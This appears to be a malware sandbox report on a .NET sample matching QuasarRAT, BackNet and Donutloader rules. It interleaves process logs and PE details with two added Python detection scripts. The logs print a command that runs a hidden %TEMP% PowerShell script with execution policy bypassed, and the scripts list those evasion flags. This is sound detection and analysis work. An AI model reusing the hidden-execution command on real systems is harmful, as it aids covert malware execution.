Source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE | Matched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
              Source: 00000008.00000002.2681806308.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
              Source: 00000008.00000000.1431061226.00000000104F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000002.00000002.1548348801.0000023217860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.csCryptographic APIs: 'CreateDecryptor'
              Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.csCryptographic APIs: 'CreateDecryptor'
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
              Source: 8.2.explorer.exe.92b0000.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@11/19@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C7C041C2 CreateToolhelp32Snapshot
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI1qW7yV9K.exe.log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | File created: C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1
Source: PI1qW7yV9K.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PI1qW7yV9K.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process (9 queries)
Source: C:\Windows\System32\svchost.exe | WMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, ExecutablePath, ProcessID from Win32_Process (8 queries)
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PI1qW7yV9K.exe | Virustotal: Detection: 52%
Source: PI1qW7yV9K.exe | ReversingLabs: Detection: 55%
Source: unknown | Process created: C:\Users\user\Desktop\PI1qW7yV9K.exe "C:\Users\user\Desktop\PI1qW7yV9K.exe"
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
Source: C:\Windows\explorer.exe | Sections loaded: mscoree.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, amsi.dll, webio.dll, cabinet.dll, rasapi32.dll, rasman.dll, rtutils.dll, wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Sections loaded: wbemcomn.dll, kernel.appcore.dll, amsi.dll, userenv.dll, profapi.dll, loadperf.dll
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: PI1qW7yV9K.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PI1qW7yV9K.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: PI1qW7yV9K.exe | Static file information: File size 5141504 > 1048576
Source: PI1qW7yV9K.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x47ce00
Source: PI1qW7yV9K.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: PI1qW7yV9K.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdbhP | source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.pdb | source: powershell.exe, 00000002.00000002.1473986709.0000023206903000.00000004.00000800.00020000.00000000.sdmp
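The process chain above (a user-writable executable spawning powershell.exe with -ExecutionPolicy Bypass -WindowStyle Hidden -File on a .ps1 in %TEMP%, which in turn drives csc.exe on a .cmdline response file in %TEMP%) is what the three Sigma titles in the summary describe. The script below is an added example, not Joe Sandbox or Sigma code: it runs a loose approximation of those three checks over Sysmon-style process-creation events constructed from the command lines in this report (PIDs other than 7816 are invented, and the two benign control events are made up), and reconstructs the parent chain of any hit. The rule names reuse the report's Sigma titles; the matching logic is this example's own, not the published Sigma rules.

```python
"""Added example: flag the PI1qW7yV9K.exe -> powershell -> csc chain in process-creation events.

Not Joe Sandbox or Sigma code. EVENTS is constructed from the command lines in the
report; only PID 7816 appears in the report, every other PID is invented, and the
two benign control events (8000, 8100) are made up for contrast.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"^[A-Z]:\\Users\\", re.IGNORECASE)
# -File / -f argument, quoted or bare; the quoted form tolerates spaces in the path.
PS_FILE_RE = re.compile(r'-f(?:ile)?\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# csc/vbc response file: @"path" or @path
RSP_RE = re.compile(r'@(?:"([^"]+)"|(\S+))')
PS_EVASION_FLAGS = ("-ExecutionPolicy Bypass", "-WindowStyle Hidden", "-NonInteractive")

EVENTS = [  # constructed from the report's command lines; PIDs other than 7816 are invented
    {"pid": 7400, "ppid": 4, "image": r"C:\Users\user\Desktop\PI1qW7yV9K.exe",
     "cmdline": r'"C:\Users\user\Desktop\PI1qW7yV9K.exe"'},
    {"pid": 7816, "ppid": 7400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"'},
    {"pid": 7900, "ppid": 7816, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"'},
    {"pid": 7912, "ppid": 7900, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP"'},
    # Benign controls (made up): a maintenance script under Program Files, and a build-tree csc run.
    {"pid": 8000, "ppid": 1234, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -File "C:\Program Files\Contoso\maintenance.ps1"'},
    {"pid": 8100, "ppid": 5678, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig @"C:\Users\dev\source\repos\App\obj\Debug\App.csproj.cmdline"'},
]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def _path_arg(match) -> str:
    return match.group(1) or match.group(2)


def chain_string(events, pid: int) -> str:
    """Root-to-leaf ancestry of pid as 'parent > child > ...' image names."""
    by_pid = {e["pid"]: e for e in events}
    names, seen = [], set()
    while pid in by_pid and pid not in seen:  # seen guards against PID reuse loops
        seen.add(pid)
        names.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(names))


def detect(events):
    """Return a list of {rule, pid, evidence, notes} findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"]).lower()
        cmd = e["cmdline"]
        parent = by_pid.get(e["ppid"])
        if name in SCRIPT_HOSTS:
            m = PS_FILE_RE.search(cmd)
            if m and TEMP_RE.search(_path_arg(m)):
                flags = [f for f in PS_EVASION_FLAGS if f.lower() in cmd.lower()]
                findings.append({"rule": "Suspicious Script Execution From Temp Folder",
                                 "pid": e["pid"], "evidence": _path_arg(m), "notes": flags})
            if parent is not None and USER_WRITABLE_RE.match(parent["image"]):
                findings.append({"rule": "Script Interpreter Execution From Suspicious Folder",
                                 "pid": e["pid"], "evidence": parent["image"], "notes": []})
        elif name in COMPILERS:
            m = RSP_RE.search(cmd)
            if m and TEMP_RE.search(_path_arg(m)):
                notes = ["parent=" + image_name(parent["image"])] if parent else []
                findings.append({"rule": "Dot net compiler compiles file from suspicious location",
                                 "pid": e["pid"], "evidence": _path_arg(m), "notes": notes})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["rule"], "| pid", f["pid"], "|", chain_string(EVENTS, f["pid"]), "|", f["evidence"], f["notes"])
```

On the report's events this yields three findings, all on the malicious chain: the .ps1 in %TEMP% with all three evasion flags, powershell launched from a Desktop executable, and csc.exe compiling a %TEMP% response file with powershell.exe as its parent. The two control events produce nothing, which is the point of keying on the path of the script or response file rather than on the interpreter alone: powershell.exe and csc.exe are legitimate, the location of their input is not.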

              Data Obfuscation

Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 8.2.explorer.exe.20bc34c0.13.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"
Source: PI1qW7yV9K.exe | Static PE information: 0xF1A8A219 [Mon Jun 23 11:16:41 2098 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01367443 pushfd ; iretd 0_2_01367445
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Code function: 0_2_01368CAE pushfd ; ret 0_2_01368CB3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF7C7C09DC7 push esi; iretd 2_2_00007FF7C7C09DCD
Source: PI1qW7yV9K.exe, KSjdraoiodUru8Ds45.cs | High entropy of concatenated method names: 'g79kQN2Jip', 'nW4lBacjpc', 'ae5kFRqYTY', 'PdwkzM40uu', 'Ppc8ph7aI4', 'wqZ8kgYCcR', 'OMo6lriETy', 'dmkfGRYpi', 'jRjPqKvKX', 'SH0cbLnd7'
Source: PI1qW7yV9K.exe, BbDY5S8XPq3qWLFR1iB.cs | High entropy of concatenated method names: 'iLo8OSI5qW', 'MR587vhxF2', 'dHl8Luu0p3', 'CaN8WhbwV4', 'TSC8lw12Xj', 'rMv83ViQca', 'i598BOxh8O', 'OpK8DMWlhn', 'jyX8mQvv7Q', 'Tb28eVGI9F'
Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, X6ryA4MF9UUYiaF1V9.cs | High entropy of concatenated method names: 'NHNd4QbNPI', 'nridHbsJAPTHJ8uC648', 'mUsIxtsjZHkEwU7krva', 'yh8b0Asf89AegXRCOrK', 'zeYARpsHjYtXDIW39aZ', 'aQsyIpsVmVLVVfpxad1', 'NSIuwCsqad7BQ1SoJwE', 'z59smistuNGYDJOyPrs', 'paEbPNs6aaDLqQA3lx1', 'c7jCpBsiyyAnViPeoiP'
Source: 2.2.powershell.exe.2321d350000.3.raw.unpack, eYqf26Tq5XNYyFIqYl.cs | High entropy of concatenated method names: 'SfTZEmsxBCXLIBtpuGm', 'GlLdyOsnPL4fEv8dVvl', 'BG3VHhQ9uU', 'O0v3WNsdnPoFM3TEmZn', 'oREVnZsKvSWT0cmVLs1', 'MI3l1rsNpctGU3CygTl', 'HogWlesoJImsIbnLMct', 'FNZPTYsBuIRIr6M4LR9', 'pYVPYJsIrkCUGGkl6OW', 'cs3fhFsgIwTQf1XQ9RN'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.dll
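The "suspicious time stamp" entry above is the COFF header's TimeDateStamp, 0xF1A8A219, which decodes to June 2098. The script below is an added example, not Joe Sandbox code: it parses the header fields needed for that check out of a PE image, decodes the stamp, and classifies it against a caller-supplied reference time. The one caveat a practitioner wants with this signal is built in: the sample is a .NET image (the report lists IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and TRID says Net Framework), and the Roslyn compiler in deterministic mode writes a hash of the compilation inputs into TimeDateStamp rather than a clock value, so a far-future date on a managed binary is weak evidence on its own. The only value taken from the report is 0xF1A8A219; the PE bytes are a header-only fixture constructed by build_minimal_pe(), and the reference epoch in the test is an assumed date.

```python
"""Added example: decode and sanity-check a PE TimeDateStamp, with the .NET caveat.

Not Joe Sandbox code. Only the constant REPORTED_TIMESTAMP comes from the report;
the header bytes are a constructed fixture from build_minimal_pe().
"""
import struct
from datetime import datetime, timezone

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR header; non-zero only in managed images
REPORTED_TIMESTAMP = 0xF1A8A219            # value the report flags as suspicious


def parse_pe_header(data: bytes) -> dict:
    """Return Machine, TimeDateStamp, Characteristics and whether a CLR header is present."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, _nsec, timestamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:           # data directories follow the PE32 optional header at +96
        ndirs_off, dirs = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:     # and the PE32+ optional header at +112
        ndirs_off, dirs = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    entry = dirs + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    is_managed = False
    if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and entry + 8 <= opt + opt_size:
        rva, size = struct.unpack_from("<II", data, entry)
        is_managed = rva != 0 and size != 0
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars, "is_managed": is_managed}


def timestamp_utc(timestamp: int) -> str:
    return datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def classify_timestamp(timestamp: int, now_epoch: int, is_managed: bool) -> str:
    """'plausible', 'implausibly-old', 'future-native' or 'future-managed'.

    A future stamp in a managed image is not by itself evidence of tampering: Roslyn
    deterministic builds store a hash of the inputs in TimeDateStamp, which decodes
    to an arbitrary date. In a native image there is no such innocent explanation.
    """
    if timestamp > now_epoch:
        return "future-managed" if is_managed else "future-native"
    if datetime.fromtimestamp(timestamp, tz=timezone.utc).year < 1995:
        return "implausibly-old"   # zeroed or otherwise scrubbed stamp
    return "plausible"


def build_minimal_pe(timestamp: int, managed: bool) -> bytes:
    """Header-only PE32 image (constructed fixture, not an executable)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(96 + 16 * 8)                    # PE32 optional header with 16 directories
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)             # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    # Machine=i386, 1 section, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    hdr = parse_pe_header(build_minimal_pe(REPORTED_TIMESTAMP, managed=True))
    now = int(datetime.now(timezone.utc).timestamp())
    print(hex(hdr["timestamp"]), timestamp_utc(hdr["timestamp"]),
          classify_timestamp(hdr["timestamp"], now, hdr["is_managed"]))
```

Run against a real file, replace the fixture with open(path, "rb").read(); for the sample in this report the result is "future-managed", which is why the stamp belongs with the other packer indicators in this section rather than standing as evidence on its own. The same function returns "future-native" for an unmanaged image, where a 2098 date has no compiler explanation.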

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File opened: C:\Windows\Explorer.EXE:Zone.Identifier (read attributes | delete)
Source: C:\Users\user\Desktop\PI1qW7yV9K.exe | Process information set: NOOPENFILEERRORBOX (19 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (28 identical entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
